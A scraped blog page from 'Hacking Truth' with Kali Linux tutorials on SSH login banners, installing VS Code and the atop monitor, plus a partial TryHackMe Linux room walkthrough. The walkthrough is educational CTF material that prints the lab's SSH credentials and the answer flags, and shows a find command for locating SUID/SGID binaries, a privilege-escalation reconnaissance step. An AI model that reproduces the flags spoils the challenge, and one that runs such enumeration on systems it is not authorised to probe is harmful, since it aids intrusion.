-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label kali linux. Show all posts
Showing posts with label kali linux. Show all posts
  • How to display a ASCII message after SSH login on linux

     

     

    How to display a ASCII message after SSH login on linux

     

     

    Display a ASCII Message After SSH Login

     

    Sometimes when you want to provide remote access to your system via SSH, you want to display a customized message on the terminal for the remotely logged-in user. In this tutorial, I will show you how to display a custom ASCII text and text message upon SSH login to your Linux server.



    Requirement

     

    You need to have installed SSH



    Let's Displaying a Message

     

    For displaying a ASCII text or normal text in linux or any other distro ,you will to perform the following steps:


    Step 1 :- First you need to open a MOTD or create a file on your system with the COMMAND shown below.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo nano /etc/motd
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$
    
    


    How to display a ASCII message after SSH login on linux




    and once this file is created or open (as you can see i have already this file in our linux system ), you can type in any messages or ASCII text as of your choice just like we did. After that, you can save this file and exit.


    ASCII Creator - CLICK HERE



    How to display a ASCII message after SSH login on linux




    Step 2 :- Check your system IP

    Step 3 :- Log into your machine through SSH to Display the message.


    You need to log into your machine through SSH by executing the following command. You can either run this command on your own machine’s terminal or you can even use any other machine on the same network for serving the very same purpose.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo su
    KumarAtulJaiswal# ssh hackerboy@192.168.43.152
    hackerboy@192.168.43.152's password: 
    Linux KumarAtulJaiswal 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64
    
    The programs included with the Kali GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    
    WELCOME  TO
    ██   ██  █████   ██████ ██   ██ ██ ███    ██  ██████      ████████ ██████  ██    ██ ████████ ██   ██ 
    ██   ██ ██   ██ ██      ██  ██  ██ ████   ██ ██              ██    ██   ██ ██    ██    ██    ██   ██ 
    ███████ ███████ ██      █████   ██ ██ ██  ██ ██   ███        ██    ██████  ██    ██    ██    ███████ 
    ██   ██ ██   ██ ██      ██  ██  ██ ██  ██ ██ ██    ██        ██    ██   ██ ██    ██    ██    ██   ██ 
    ██   ██ ██   ██  ██████ ██   ██ ██ ██   ████  ██████         ██    ██   ██  ██████     ██    ██   ██ 
                                                                                     www.hackingtruth.in 
    
    
    
                                                                                                         
    You have new mail.
    Last login: Sun Jul 11 20:07:56 2021 from 192.168.43.152
    ┏━(Message from Kali developers)
    ┃
    ┃ This is a minimal installation of Kali Linux, you likely
    ┃ want to install supplementary tools. Learn how:
    ┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
    ┃
    ┃ We have kept /usr/bin/python pointing to Python 2 for backwards
    ┃ compatibility. Learn how to change this and avoid this message:
    ┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
    ┃
    ┗━(Run: “touch ~/.hushlogin” to hide this message)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    


    How to display a ASCII message after SSH login on linux




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • visual studio code install in linux version 2021.2


    visual studio code install in linux version 2021.2


    VSCode a.k.a


    In this short tutorial shows how to install Visual Studio Code on Linux and the new version of kali linux 2021.2 version have alread installed visual studio code on that linux. visual studio code install in linux version 2021.2

    Visual Studio Code is one of top IDEs for Python.

    Visual Studio Code is an open source IDE developed by Microsoft which is available for Linux. It offers many interesting features like:


        Syntax highlight
        Code completion
        Version control
        IntelliSense
        marketplace
        Developer Community

     


    Install Visual Studio Code


    VSCode a.k.a. Visual Studio Code Open Source (“Code-OSS”) - Code editor

    VSCode have been included into the kali-linux-large metapackage, so they are included on the installer image for people doing a fresh install. Otherwise you will need to upgrade Kali (if you already have the kali-linux-large install) or manually install them (if you want them!):

     

    sudo apt update && sudo apt install -y code-oss
     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo apt update && sudo apt install -y code-oss
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    

     

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo apt-get install code-oss
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      autopoint debugedit dh-autoreconf dh-strip-nondeterminism dwz kbuild libarchive-cpio-perl libdebhelper-perl
      libfile-stripnondeterminism-perl libmail-sendmail-perl librpmbuild9 librpmsign9 libsub-override-perl libsys-hostname-long-perl
      linux-headers-5.9.0-kali5-amd64 linux-headers-5.9.0-kali5-common linux-image-5.9.0-kali5-amd64 linux-kbuild-5.9
      python3-distro-info python3-software-properties rpm unattended-upgrades
    Use 'sudo apt autoremove' to remove them.
    The following additional packages will be installed:
      libjs-highlight.js libnode72 nodejs nodejs-doc
    Suggested packages:
      npm
    The following NEW packages will be installed:
      code-oss libjs-highlight.js libnode72 nodejs nodejs-doc
    0 upgraded, 5 newly installed, 0 to remove and 3 not upgraded.
    Need to get 85.9 MB of archives.
    After this operation, 321 MB of additional disk space will be used.
    Do you want to continue? [Y/n] Y
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 libnode72 amd64 12.21.0~dfsg-3 [8,382 kB]
    Get:2 http://ftp.harukasan.org/kali kali-rolling/main amd64 nodejs amd64 12.21.0~dfsg-3 [146 kB]                                     
    Get:3 http://ftp.harukasan.org/kali kali-rolling/main amd64 code-oss amd64 1.56.1-0kali2 [74.4 MB]                                   
    Get:4 http://ftp.harukasan.org/kali kali-rolling/main amd64 libjs-highlight.js all 9.18.5+dfsg1-1 [397 kB]                           
    Get:5 http://ftp.harukasan.org/kali kali-rolling/main amd64 nodejs-doc all 12.21.0~dfsg-3 [2,538 kB]                                 
    Fetched 85.9 MB in 7min 47s (184 kB/s)                                                                                               
    Selecting previously unselected package libnode72:amd64.
    (Reading database ... 416536 files and directories currently installed.)
    Preparing to unpack .../libnode72_12.21.0~dfsg-3_amd64.deb ...
    Unpacking libnode72:amd64 (12.21.0~dfsg-3) ...
    Selecting previously unselected package nodejs.
    Preparing to unpack .../nodejs_12.21.0~dfsg-3_amd64.deb ...
    Unpacking nodejs (12.21.0~dfsg-3) ...
    Selecting previously unselected package code-oss.
    Preparing to unpack .../code-oss_1.56.1-0kali2_amd64.deb ...
    Unpacking code-oss (1.56.1-0kali2) ...
    Selecting previously unselected package libjs-highlight.js.
    Preparing to unpack .../libjs-highlight.js_9.18.5+dfsg1-1_all.deb ...
    Unpacking libjs-highlight.js (9.18.5+dfsg1-1) ...
    Selecting previously unselected package nodejs-doc.
    Preparing to unpack .../nodejs-doc_12.21.0~dfsg-3_all.deb ...
    Unpacking nodejs-doc (12.21.0~dfsg-3) ...
    Setting up libnode72:amd64 (12.21.0~dfsg-3) ...
    Setting up libjs-highlight.js (9.18.5+dfsg1-1) ...
    Setting up nodejs (12.21.0~dfsg-3) ...
    update-alternatives: using /usr/bin/nodejs to provide /usr/bin/js (js) in auto mode
    Setting up nodejs-doc (12.21.0~dfsg-3) ...
    Setting up code-oss (1.56.1-0kali2) ...
    Processing triggers for doc-base (0.11.1) ...
    Processing 1 added doc-base file...
    Processing triggers for libc-bin (2.31-12) ...
    Processing triggers for man-db (2.9.4-2) ...
    Processing triggers for shared-mime-info (2.0-1) ...
    Processing triggers for mailcap (3.69) ...
    Processing triggers for kali-menu (2021.2.3) ...
    Processing triggers for desktop-file-utils (0.26-1) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    

     

     

     

     

    For open visual studio code, it is simple, simply type vscode in terminal and hit enter but here is a problem if you exit the terminal your VS code will be terminated but how do fixed it!!! 

     





     

     

    How to set VS code in Panel 


    So now we will see some steps, with the help of which we will be able to set up VS Code in the Linux panel. 


    Step 1 - Open panel preferences






    Step 2 - add some launcher so click on add button

     

     


     

     

     

    Step 3 - select launcher and add it..






     

     

    Step 5 - As you can see the launcher has been created


     

     


     

     

     

    Step 6 - Double click on the launcher, after that a box will open next to you, in which you have to click on the plus icon.






     

     

    Step 7 -Then we find a VS code installation file, so simple type "locate vscode" and as you can see /home/hackerboy/.vscode file, copy this (There may be a different directory in your case). NOTE - this is optional. 

     


     




     

     

    Step 8 - Then, add Name, command and working directory and add icon


    Name - visual studio code ( you can change )

    Command - vscode (not change)

    Working Directory - /home/hackerboy/.vscode (There may be a different directory in your case).

    Icon - Click Here 

     

    Create.

     


     


     



     

    Step 9 - You can easily open it whenever you want 







     

    Customization 


    Before running the program in Visual Code, we will do some setting which will help you a lot in automation means to run the code smoothly. for example

    IDE :- python, c/c++ ✅

    Code runner :- clear previous output

    Code runner :- run in terminal ✅

    Code runner :- save file before run ✅

     

    Click on extension section

     

     


     

     

     

    Search code runner and install them

     

     

     


     

     

     

    then go to setting option and in user simple search code runner

    Then tick mark on -

    clear previous output ✅

    Code runner :- run in terminal ✅

    Code runner :- save file before run ✅

     


     

     


     

     

     

    so as you can after installing IDE (IDE already installed in VS code) as you can see our c++ program is running. 



     


     

     

    Vola!!!

     

    A few notes about code-oss (aka VSCode): (credit kali linux)

    • We are compiling this from source, rather than using the pre-built binaries
    •  
    • The upside to this is that telemetry data is disabled by default
    •  
    • The downside is that some aspects of the marketplace may not work. If you find these limitations a problem, you may wish to uninstall the Kali package and switch to the VSCode pre-built binaries





    You also may question why it was named code-oss, rather than code


    • Code-OSS is what the source-code calls itself, which is used as the base before the configurations are applied for the pre-compiled binaries that gets distributed as “code”.
    •  
    • As we are using the source-code, we used the variables defined by it.
    •  
    • The two different names help to distinguish the differences between them (also prevents any clashes and conflicts!).
    •  
    • We also included various aliases in our package to help bridge between the two different versions. Meaning, calling vscode and code will use our package, code-oss, with a friendly notice (when installed).

     

     

     


    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

  • atop a CLI monitoring tool for linux


    atop a CLI monitoring tool for linux




     

    The atop command displays you a more anatomized view of your server's performance. The program atop is an interactive monitor to view the load on a Linux system. It shows the occupation of the most critical hardware resources (from a performance point of view) on system level, i.e. cpu, memory, disk and network. It also shows which processes are responsible for the indicated load with respect to cpu and memory load on process level. Disk load is shown per process if "storage accounting" is active in the kernel. Network load is shown per process if the kernel module `netatop' has been installed. atop a CLI monitoring tool for linux

     

     

    Installation






    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo apt-get install atop        
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      libbasicusageenvironment1 libdap25 libgarcon-gtk3-1-0 libgroupsock8 libgtop-2.0-11 libgtop2-common libjsoncpp1 liblivemedia77 libre2-8
      librpm8 librpmbuild8 librpmio8 librpmsign8 libsane libusageenvironment3 libxdo3 libxfce4ui-utils libxpresent1 light-locker
      linux-headers-5.9.0-kali2-amd64 linux-headers-5.9.0-kali2-common linux-image-5.9.0-kali2-amd64 python3-atomicwrites python3-pathtools
      tango-icon-theme x11-session-utils xdotool xfce4-appfinder xfce4-helpers xfce4-panel xfce4-pulseaudio-plugin xfce4-session xfce4-settings
      xfdesktop4 xfdesktop4-data xfwm4 xiccd xinit xorg
    Use 'sudo apt autoremove' to remove them.
    The following NEW packages will be installed:
      atop
    0 upgraded, 1 newly installed, 0 to remove and 137 not upgraded.
    Need to get 201 kB of archives.
    After this operation, 511 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 atop amd64 2.6.0-2 [201 kB]
    Fetched 201 kB in 18s (11.1 kB/s)
    Selecting previously unselected package atop.
    (Reading database ... 407475 files and directories currently installed.)
    Preparing to unpack .../atop_2.6.0-2_amd64.deb ...
    Unpacking atop (2.6.0-2) ...
    Setting up atop (2.6.0-2) ...
    update-rc.d: We have no instructions for the atopacct init script.
    update-rc.d: It looks like a non-network service, we enable it.
    Created symlink /etc/systemd/system/timers.target.wants/atop-rotate.timer → /lib/systemd/system/atop-rotate.timer.
    Created symlink /etc/systemd/system/multi-user.target.wants/atop.service → /lib/systemd/system/atop.service.
    atop-rotate.service is a disabled or a static unit, not starting it.
    atopacct.service is a disabled or a static unit, not starting it.
    Processing triggers for kali-menu (2021.2.0) ...
    Processing triggers for man-db (2.9.4-2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/pygeoip/GeoOccupy-new]
    └─$ 
    
    
    
    








     

    Every interval (default: 10 seconds) information is shown about the resource occupation on system level (cpu, memory, disks and  network  layers), followed by a list of processes which have been active during the last interval (note that all pro‐ cesses that were unchanged during the last interval are not shown, unless the key 'a' has been pressed or unless sorting on memory  occupation is done). If the list of active processes does not entirely fit on the screen, only the top of the list is shown (sorted in order of activity). The intervals are repeated till the number of samples (specified as command argument) is reached, or till the  key  'q' is pressed in interactive mode.

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ atop
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    
    
    







     

    When atop is started, it checks whether the standard output channel is connected to a screen, or to a file/pipe. In the first case it produces screen control codes (via the ncurses library) and behaves interactively; in the second case it pro‐ duces flat ASCII-output.

     

     


    ATOP - KumarAtulJaiswal                                       2021/05/13  21:03:18                                       ----------------                                        10s elapsed
    PRC | sys    1.07s | user   4.10s |               | #proc    177 | #trun      2 | #tslpi   565 |               | #tslpu     0 | #zombie    0 | clones     9 |               | no  procacct |
    CPU | sys       9% | user     37% |  irq       0% | idle    354% | wait      0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       3% | user      9% |  irq       0% | idle     88% | cpu002 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user     10% |  irq       0% | idle     88% | cpu000 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu001 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu003 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
    CPL | avg1    0.65 | avg5    0.61 |               | avg15   0.51 |              |              |  csw    27567 | intr   10817 |              |              |  numcpu     4 |              |
    MEM | tot     3.6G | free  125.7M |  cache   1.4G | dirty   0.9M | buff  146.2M | slab  175.2M |  slrec 103.7M | shmem 221.1M | shrss  30.5M | vmbal   0.0M |  zfarc   0.0M | hptot   0.0M |
    SWP | tot     7.5G | free    7.5G |               |              |              | swcac   0.0M |               |              |              | vmcom   4.3G |               | vmlim   9.4G |
    PSI | cpusome   1% | memsome   0% |  memfull   0% | iosome    0% | iofull    0% | cs     1/2/2 |               | ms     0/0/0 | mf     0/0/0 | is     0/0/2 |  if     0/0/1 |              |
    DSK |          sda | busy      1% |  read       0 |              | write      3 | KiB/r      0 |  KiB/w     26 | MBr/s    0.0 | MBw/s    0.0 |              |  avq     1.70 | avio 20.0 ms |
    NET | transport    | tcpi      18 |  tcpo      23 | udpi       2 | udpo       2 | tcpao      2 |  tcppo      0 | tcprs      0 | tcpie      0 | tcpor      0 |  udpnp      0 | udpie      0 |
    NET | network      | ipi       21 |  ipo       26 |              | ipfrw      0 | deliv     21 |               |              |              |              |  icmpi      1 | icmpo      1 |
    NET | usb0    ---- | pcki      21 |  pcko      26 | sp    0 Mbps | si    6 Kbps | so    4 Kbps |  coll       0 | mlti       0 | erri       0 | erro       0 |  drpi       0 | drpo       0 |
    
        PID       SYSCPU       USRCPU       RDELAY         VGROW        RGROW       RUID           EUID            ST       EXC        THR        S       CPUNR        CPU       CMD         1/3
      28734        0.04s        1.64s        0.01s            0K           0K       hackerbo       hackerbo        --         -          7        R           1        17%       qterminal
        846        0.33s        0.76s        0.01s         7052K           0K       root           root            --         -         21        S           0        11%       Xorg
       3478        0.14s        0.32s        0.07s            0K        7708K       hackerbo       hackerbo        --         -         71        S           0         5%       firefox-esr
       3662        0.04s        0.23s        0.03s            0K         192K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
       3629        0.05s        0.20s        0.04s            0K         264K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
      31181        0.04s        0.20s        0.00s            0K        -620K       hackerbo       hackerbo        --         -         26        S           1         2%       Web Content
       2281        0.05s        0.14s        0.00s            0K           0K       hackerbo       hackerbo        --         -          7        S           0         2%       xfwm4
       3679        0.03s        0.13s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           3         2%       Web Content
       2685        0.03s        0.11s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           1         1%       panel-38-netlo
       2688        0.03s        0.10s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         1%       panel-40-cpugr
       3649        0.05s        0.07s        0.01s            0K           0K       hackerbo       hackerbo        --         -         24        S           1         1%       Web Content
      24581        0.11s        0.00s        0.02s            0K           0K       root           root            --         -          1        I           2         1%       kworker/2:0-ev
      32260        0.04s        0.04s        0.00s         4912K        3724K       hackerbo       hackerbo        --         -          1        R           3         1%       atop
       3801        0.00s        0.07s        0.00s            0K         264K       hackerbo       hackerbo        --         -         23        S           1         1%       WebExtensions
       3641        0.02s        0.03s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         1%       Web Content
        823        0.00s        0.02s        0.00s            0K           0K       debian-t       debian-t        --         -          1        S           1         0%       tor
       2693        0.01s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         0%       panel-17-pulse
      32236        0.01s        0.01s        0.00s          132K          28K       root           root            --         -          1        S           1         0%       4nonimizer
       9614        0.01s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         0%       Web Content
       2511        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           3         0%       xfce4-panel
       2262        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           2         0%       at-spi2-regist
        745        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          4        S           1         0%       rsyslogd
         13        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           2         0%       rcu_sched
         23        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        S           2         0%       ksoftirqd/2
      30029        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           0         0%       kworker/u8:4-e
      29732        0.00s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         25        S           1         0%       Web Content
    
    





     

    Any Help?





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ atop -h
    Usage: atop [-flags] [interval [samples]]
                    or
    Usage: atop -w  file  [-S] [-a] [interval [samples]]
           atop -r [file] [-b [YYYYMMDD]hhmm] [-e [YYYYMMDD]hhmm] [-flags]
    
            generic flags:
              -V  show version information
              -a  show or log all processes (i.s.o. active processes only)
              -R  calculate proportional set size (PSS) per process
              -W  determine WCHAN (string) per thread
              -P  generate parseable output for specified label(s)
              -L  alternate line length (default 80) in case of non-screen output
              -f  show fixed number of lines with system statistics
              -F  suppress sorting of system resources
              -G  suppress exited processes in output
              -l  show limited number of lines for certain resources
              -y  show threads within process
              -Y  sort threads (when combined with 'y')
              -1  show average-per-second i.s.o. total values
    
              -x  no colors in case of high occupation
              -g  show general process-info (default)
              -m  show memory-related process-info
              -d  show disk-related process-info
              -n  show network-related process-info
              -s  show scheduling-related process-info
              -v  show various process-info (ppid, user/group, date/time)
              -c  show command line per process
              -o  show own defined process-info
              -u  show cumulated process-info per user
              -p  show cumulated process-info per program (i.e. same name)
              -j  show cumulated process-info per container
    
              -C  sort processes in order of cpu consumption (default)
              -M  sort processes in order of memory consumption
              -D  sort processes in order of disk activity
              -N  sort processes in order of network activity
              -E  sort processes in order of GPU activity
              -A  sort processes in order of most active resource (auto mode)
    
            specific flags for raw logfiles:
              -w  write raw data to   file (compressed)
              -r  read  raw data from file (compressed)
                  symbolic file: y[y...] for yesterday (repeated)
                  file name '-': read raw data from stdin
              -S  finish atop automatically before midnight (i.s.o. #samples)
              -b  begin showing data from specified date/time
              -e  finish showing data after specified date/time
    
            interval: number of seconds   (minimum 0)
            samples:  number of intervals (minimum 1)
    
    If the interval-value is zero, a new sample can be
    forced manually by sending signal USR1 (kill -USR1 pid_atop)
    or with the keystroke 't' in interactive mode.
    
    Please refer to the man-page of 'atop' for more details.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$                                              
    
    




     

    Advantages of atop


    Atop is an ASCII, full-screen performance monitor which can log and report the activity of all server processes. One feature I really like is that atop stays active in the background for long-term server analysis (up to 28 days by default). Other advantages include:

    • Shows resource usage of all processes, even those that are closed or completed.
    • More Linux resources.
    • Advanced Linux Commands Cheat Sheet for Developers.
    • Get Started with Red Hat Insights.
    • Download Now: Basic Linux Commands Cheat Sheet.
    • Linux System Administration Skills Assessment.
    • Monitors threads within processes and ignores processes that are unused.
    • Accumulates resource usage for all processes and users with the same name.
    • Highlights critical resources using colors (red).
    • Adds or removes columns as the size of the display window changes.
    • Includes disk I/O and network utilization.
    • Uses the netatop kernel module to monitor TCP, UDP, and network bandwidth.






    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

  • TryHackMe NIS - Linux Part I

     

     

    Task 2 ls   This task should give you a better understanding of the command ls and a few of the switches that the command can take and what are some of the more efficient ones. Below is a screenshot of the help menu, however, feel free to use the man. TryHackMe NIS - Linux Part I

     

     

    NIS - Linux Part I

    Enhance your Linux knowledge with this beginner friendly room! 

     

    Task 1 What is this room about?

    In this task, we will be looking back at ZTH Linux and a few other topics that seem to cause some trouble around the beginners. A requirement for this room is to finish the Learn Linux room - https://tryhackme.com/room/zthlinux.

    As it covers all the basic requirements and this is just a follow up to it in order to strengthen the understanding you gained throughout the room. In order to do so.
    Below I will be asking a few questions related to that room, so please, make sure to complete it first :). If you didn't feel free to go through the tasks and come back to this once you finished the room.



    The commands you are allowed to use in this room are:

    •     cat
    •     tac
    •     head
    •     tail
    •     xxd
    •     base64
    •     find
    •     grep
    •     echo
    •     xargs
    •     hexeditor
    •     tar
    •     gzip
    •     7zip
    •     binwalk


     

    Bear in mind, commands such as cd are not allowed.


    *The SSH credentials are chad:Infinity121 *

    1)What is shiba3's password?

    Ans :-

     

    2) What is shiba4's password?

    Ans :- 


     

    3)What is the root.txt flag? 

    Ans :- 

     

     


     

    Task 2 ls


    This task should give you a better understanding of the command ls and a few of the switches that the command can take and what are some of the more efficient ones. Below is a screenshot of the help menu, however, feel free to use the man. TryHackMe NIS - Linux Part I








    Task 3 cat

     

    Hopefully, the above screenshot should help you go through a few of the tasks below, however further research is required. A good thing to know is that ls supports multiple ways of chaining switches. Such as:



    •     ls -x -y -z
    •     ls -xyz


     

    In some cases, you would need to keep evidence of your findings. Below we will start with some basic commands you should be familiar with.

     

    1) How do you run the ls command?

    Ans :- ls


     

    2) How do you run the ls command to show all the files inside the folder?

    Ans :- ls -a

     


    3) How do you run the ls command to not show the current directory and the previous directory in the output? (almost everything)

    Ans :- ls -a


     

    4) How do you show the information in a long listing format using ls?

    Ans :- ls -l
     

     

    5) How do you show the size in readable format? e.g. k, Mb, etc

    Ans :- ls -h

     

    6) How do you do a recursive ls?

    Ans :- ls --recursive


     

    7) How many files did you locate in the home folder of the user?(non-hidden and not inside other folders)

    Ans :- 13



     

    Task 3 cat


    The cat command is one of the most common Linux commands that people use, however, in some instances, the cat command cannot be used as it's removed.

    Below is a screenshot of the cat command's help menu.


     





    But, as we are professionals we know about a few alternatives of going around it:
     
    The first command we are going to learn about is tac. Yes, cat spelt backwards. It is similar to the command, with the downside of less functionality.







    Thus being a good tool to add to your toolbelt when you are limited by your reverse shell.


    Another tool that can be used is head. This is usually used to get the beginning part of a file, however, you can use it to your heart's content and grab as many lines as you want.







    One more tool that can be used to grab the content of a file is tail. This is similar to the head command, however, as the name implies it will grab the last part of a file.





     




     

    Another useful command is xxd. this can be used to generate a hex dump of the content of a file. Then, if you want you can either just read the text from the right-hand side or convert from hex to ASCII.





     


     

     

    Similar to the above you can use the base64 command to convert the text to base64 and then convert it back to ASCII.




















    1) What is the content of cat.txt?

    Ans :- THM{11adbee391acdffee901}



    2) What is the content of tac.txt?

    Ans :- THM{acab0111aaa687912139}



    3) What is the content of head.txt?

    Ans :- THM{894abac55f7962abc166}



    4) What is the content of tail.txt?

    Ans :- THM{1689acafdd20751acff6}



    5) What is the content of the xxd.txt?

    Ans :- THM{fac1aab210d6e4410acd}



    6) What is the content of base64.txt?

    Ans :- THM{aa462c1b2d44801c0a31}









    Task 4 find


    The find command is one of the most useful commands on a Linux operating system.



     





    This command can help us find specific files that match a pattern like:


    find . -name *.txt


    Or we can use it to find files that have a specific extension:


    find / -type f -name "*.bak"



    This simple command will start browsing the machine directory, finding all the files with extension .bak (backup).










    But we can also use it to find files that have the SUID or SGID bit set like so:



    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;

    This command combines permissions 4000 (SUID) and 2000 (SGID)


     





     

     

     

    1) How many .txt files did you find in the current folder?

    Ans :- 8

     

    2) How many SUID files have you found inside the home folder?

    Ans :- 0









    Task 5 grep


    grep is a really useful command to grab text from files.






    Let's read through a few examples of grep commands and see how we can use them for our own benefit in a scenario.

    grep "word" file



     


     

    Grep not only allows us to check if a certain word exists in the file but also outputs us the context in which the word had appeared. As you can see on the screenshot above, we were able to find an exact match to the word 'if' in the file script.py.

    We can also compare two files with similar names using.

     

    grep "word" file*







    How many times does the word "hacker" appear in the grep files? (including variations)











    Task 6 sudo



    sudo command allows certain users to execute a command as another user, according to settings in the /etc/sudoers file. By default, sudo requires that users authenticate themselves with a password of another user.

    In the real-life scenario, sudo is mostly used to switch to root account and gain an ability to fully interact with the system.






    sudo -l appears to be the most commonly used switch. It can always tell you which commands are you allowed to run as another user on the following system, and in some cases, can give you a clue to root access.

     

    1) Is the user allowed to run the above command? (Yay/Nay)

    Ans :- 








    Task 7 chmod

    The chmod command sets the permissions of files or directories.







     

    Those permissions are divided between three main characters:

       

    • User
    • Group
    • Other


     

    All of them can rather read, write or execute a file. Permission to do so can be granted using chmod.



